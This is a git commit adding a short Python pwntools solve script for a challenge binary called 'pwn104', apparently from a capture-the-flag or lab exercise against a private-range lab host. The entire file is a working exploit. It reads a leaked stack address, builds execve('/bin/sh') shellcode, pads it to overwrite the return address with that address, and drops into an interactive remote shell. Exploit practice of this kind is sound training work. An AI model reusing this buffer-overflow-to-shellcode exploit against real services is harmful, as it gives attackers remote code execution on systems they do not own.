solve script

2024-10-28 01:12:36 +03:00
parent 6ccc9f60d0
commit 31dbf17bda
1 changed files with 31 additions and 0 deletions
@@ -0,0 +1,31 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./pwn104", checksec=False)
+# r = process()
+r = remote("10.10.167.194", 9004)
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# leak
+r.recvuntil(b"at ")
+stack = int(r.recvline().strip(), 16)
+log.info("stack: %#x", stack)
+
+# shellcode
+sc = """
+lea rdi, [rsi+13]
+mov al, 59
+cqo
+xor rsi, rsi
+syscall
+"""
+sc = asm(sc)
+sc += b"/bin/sh\0"
+sc += b"A"*(88-len(sc))
+sc += p64(stack)
+s(sc)
+
+r.interactive()